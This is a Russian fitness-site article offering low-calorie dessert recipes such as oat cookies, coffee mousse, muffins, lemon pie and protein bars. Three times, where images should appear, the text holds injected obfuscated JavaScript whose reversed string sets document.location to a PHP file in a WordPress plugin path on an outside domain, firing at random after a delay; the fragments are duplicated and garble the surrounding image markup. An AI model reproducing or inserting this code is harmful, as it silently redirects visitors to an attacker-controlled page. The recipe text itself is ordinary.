В отличие от обычных сладостей, эти десерты будет помогать вам в построении идеальной фигуры, так как состоят только из натуральных и полезных продуктов, богатых питательными элементами! Включив такие десерты в свою диету, вы заметно ее украсите без вреда для тренировок!
Овсяное печенье
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolia_102503632_subscription_xxl.jpg» alt=»» width=»700″ height=»467″ />
(подготовка — 10 минут, приготовление — 20 минут)
Для 1 порции вам понадобится:
- 1 столовая ложка пшеничных отрубей;
- 2 яйца;
- 2 столовые ложки овсяных отрубей;
- Жидкий подсластитель (пол чайной ложки)
- Ванильный сахар (по вкусу)
Приготовление:
Смешать в миске 2 желтка, подсластитель, ароматизатор и отруби. Взбить белки в густую пену и аккуратно добавить в полученную из желтков смесь. Вылить тесто в плоскую форму для выпечки. Выпекать около 15-20 минут в духовке, предварительно нагретой до 180 °С .
Миндальное желе
(подготовка — 15 минут, приготовление — 5 минут)
Для 2-х порций вам понадобится:
- 400 мл обезжиренного молока;
- 3 пластинки желатина;
- 6 капель миндального ароматизатора.
Приготовление:
Вскипятить в кастрюле молоко с миндальным ароматизатором, снять с огня. Размягчить листья желатина в небольшом количестве воды, затем слить ее и добавить желатин в кипящее молоко. Помешивать, пока желатин полностью не растворится. Вылить желе в тарелку (слой желе должен быть не менее 1 см) и поставить в холодильник, чтобы оно застыло.
Кофейный мусс
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock_66622162-1.jpg» alt=»» width=»700″ height=»475″ />
(время — 10 минут, + 3 часа)
Для 6-ти порций вам понадобится:
- 300 г обезжиренного творога (0 %);
- 4 яичных белка;
- 2 столовые ложки подсластителя;
- 1 столовая ложка растворимого кофе.
Приготовление:
Размять творог вилкой. Добавить подсластитель. Взбить белки в густую пену и аккуратно добавить в творог. Добавить кофе. Вылить в форму и дать постоять 3 часа в холодильнике.
Маффины
(подготовка — 10 минут, приготовление — 20-30 минут)
На 4 порции вам понадобится:
- 4 яйца;
- 4 столовые ложки мягкого обезжиренного творога (0 %);
- цедра лимона, корица или кофе на выбор;
- ароматизатор на выбор;
- 4 столовые ложки пшеничных отрубей;
- 8 столовых ложек овсяных отрубей;
- половина чайной ложки подсластителя.
Приготовление:
Разогреть духовку до 180 °С. Взбить белки. Смешать остальные Ингредиенты и добавить в белки. Выложить тесто в формочки для кексов и выпекать 20-30 минут.
Лимонный пирог
(подготовка — 15 минут, приготовление — 35 минут)
Для 6-ти порций вам понадобится:
- 3 яйца;
- 300 мл холодной воды;
- подсластитель;
- 1 лимон;
- щепотка соли.
Приготовление:
Взбить желтки с подсластителем. Добавить воду, сок и тертую цедру лимона. Варить на водяной бане на медленном огне, помешивай деревянной лопаточкой, пока смесь не загустеет. Снять с огня. Посолить белки, добавить подсластитель и взбить все в густую пену. Соединить белки с теплой массой. Выложить массу в форму для выпечки диаметром от 28 см (с антипригарным покрытием). Выпекать в духовке при температуре 180 °С, пока не подрумянится.
Белковые батончики
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonchiki.jpg» alt=»» width=»700″ height=»525″ />
Ингредиенты:
- 1 столовую ложку чистого меда
- 1 чайная ложка ванильного экстракта
- 100 грамм нежирного творога
- 1/2 ч.л. молотой корицы
- 100 мл воды
- 100 грамм арахисового масла
- 5 совков сывороточного протеина
- 100 грамм овсяной муки
- 50 грамм миндаля (натертого)
Приготовление:
Добавить мед, ваниль, творог, корицу и воду в блендер или в миксер и мешать до получения однородной массы.Вываливаем нашу смесь в миску вместе с арахисовым маслом. Перемешиваем, попутно добавляя протеин. К получившейся смеси добавляем овсяную муку и снова смешиваем.
В идеале нам понадобится противень с ячейками, чтобы не пришлось резать получившийся пирог на батончики. Либо используем глубокий противень и потом уже режем.Запекаем до полной готовности и убираем в холодильник на 2 часа.
Питательная ценность одного батончика:
- Белки: 29г
- Углеводы: 25 г
- Калории: 220 ккал
Последний десерт особенно подходит для бодибилдера, да и для любого человека, занимающегося спортом. Надеемся, что вы нашли подходящие рецепты полезных десертов в этой статье!
Друзья, поддержите нашу группу в Фейсбуке, поделитесь этим постом с друзьями или нажмите кнопку «Мне нравится!» и Вы всегда будете в курсе свежих новостей «Дежурной Качалки»!
Для вас мы собираем лучшие тренировки, рекомендации по правильному питанию и конечно же юмор из мира красивых, энергичных и здоровых людей — таких как мы с вами!